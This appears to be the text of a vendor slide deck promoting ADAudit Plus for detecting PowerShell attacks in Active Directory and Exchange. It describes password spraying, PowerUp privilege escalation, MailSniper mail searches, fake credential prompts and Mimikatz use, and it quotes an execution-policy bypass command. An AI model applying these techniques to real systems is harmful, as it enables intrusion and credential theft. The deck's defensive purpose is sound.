2. Major issues with native PowerShell (PS) auditing
Large volume of logs generated (e.g. greater than 100 logs
must be checked to detect a potential brute-force attack)
Users may use PS for legitimate reasons - Numerous logs that are a
combination of malicious PS scripts and legitimate scripts
Limited search capabilities - No filtered search (e.g. tracking
malicious scripts by reading the code, commands invoked, etc.)
No instant alerts upon the execution of malicious commands/scripts
Cannot apply remedial measures when malicious scripts/cmdlets are
detected
3. The ADAudit Plus approach to detect PowerShell attacks
Performs filtered searches
for malicious PS
commands/scripts
Alerts the admin via
SMS/email
Takes corrective action
Attacker gains access/insider
goes rogue
Runs a malicious script
using PS
5. Get a bird’s-eye view on all PowerShell scripts
Bird’s-eye view of scripts and
commands executed by users
Granular search based on users, commands invoked, and
more
6. A classic brute-force attack on the administrator account
• The simplicity of a brute-force attack is that a malicious actor can try numerous
predictable and vulnerable password patterns to compromise a user’s password
• Often these attacks involve manually keying in a password during native logons,
which can raise suspicion due to the rise in the number of logon failures
• But with PowerShell, millions of passwords can be brute-forced:
– And the administrator account (with the SID 500) is likely the target, because these
accounts can never be deleted from Active Directory and have no lockout policy!
7. Detecting PowerShell-based brute-force attacks with ADAudit Plus
Perform granular
searches about users
who executed PS
scripts, and get the
script path
Find the
exact script
code
Search based
on commands
invoked
8. A domain password spray attack using PowerShell
• A domain password spray attack could be a slightly more advanced version of a
typical brute-force attack
• In a password spray attack, an attacker specifies an entire password list or a single
password, and performs a spray attempt on all accounts within the domain
• The password spray is performed very cautiously to not lockout any account and is
within the lockout threshold, and there is always a 30-minute wait between sprays
(which can be modified based on the lockout observation window)
9. Detecting password spray attacks with ADAudit Plus
A code block in the
script to get the
lockout counter
reset time
Find details like the
name, SID of
account who ran
the script, and more
Find complete
script details
10. Specific script functions (like finding the lockout observation window) can be detected
with ADAudit Plus, and corrective actions (like changing the lockout observation time )
can be immediately performed to counter the attack attempt
11. Privilege escalation attacks using PowerShell
• PowerShell is not only used for password-based attacks, but for post-
exploitation activities, like privilege escalation as well
• Powerup is a PowerShell tool that allows a malicious actor, with the
help of PowerShell script, to install and execute a Windows Installer
(MSI) application
• The MSI application, when run, offers a GUI to secretly add a backdoor
user to any group within Active Directory
12. Detecting privilege escalation attacks with ADAudit Plus
Function to get a list of
unattended install files
(that may have
deployment credentials)
for privilege escalation
Function to write out
a pre-compiled MSI
installer that
prompts for
user/group addition
Function to
get a list of
exploitable
services
13. Bypassing execution policies with PowerShell
• The starting point before running any malicious PowerShell script is
bypassing the default execution policy
• The execution policy, if set to restricted, prevents malicious actors
from running PowerShell scripts/code that are not authorized by
Microsoft or are not from verified sources
• But it is also extremely easy to bypass these policies; all you need to do
is run the command Set-ExecutionPolicy unrestricted, and that’s it!
Any malicious code can now be executed without any hindrance
14. Detecting execution policy bypass attempts with ADAudit Plus
Search for bypassing
commands and which
user invoked it
Find the exact
commands run,
values changed, etc.
15. Attacking Exchange Servers with PowerShell
• PowerShell can be used to attack not only Active Directory, but hybrid environments,
too – in this case, Exchange or Office 365
• MailSniper is a free tool that can be used to perform guessing attacks to
compromise domains and usernames; it can also perform a password spray attack
on the accounts that have a mailbox in the Exchange Server
• And once a user is compromised, the credentials can be used to perform a global
mail search, and write out emails (in a CSV file) containing sensitive data (logon
credentials)
16. Discovering Exchange/0ffice365 attacks with ADAudit Plus
Get credential
command, which
provides a dialog
box to enter
account credentials
An Invoke-
WebRequest to
connect to an
Exchange Server
A GlobalMailSearch
attempt to read emails
being passed within an
organization
17. Get-Credential: This command can be used by an attacker to obtain a user's credentials.
An unassuming user, upon seeing a dialog box prompting for credentials, will enter the
required details under the impression that it is a legitimate request
18. There is more than one way to leverage PowerShell for attacks
19. Detecting remote PowerShell attempts, version downgrades, and third-party
attack toolkit use with ADAudit Plus
20. An attempt to
create a PS remote
session to remotely
execute commands
Often, a first step in
PSRemote attacks:
enabling remoting
within PowerShell
A PowerShell version
downgrade attempt to enable
an earlier version of PS that
lacks essential security
features
Invoking a third party
tool (Mimikatz) for
post-exploitation
activities
22. Instant PowerShell-based alerts
Set threshold-
based alerts
Granularly filter
alerts based on
various
parameters
Instantly notify
the admin/take
corrective action
23. PowerShell-based attacks are on the rise. It is crucial to have a bird’s-eye view of all
PowerShell-based activities and a strong 24x7 defense mechanism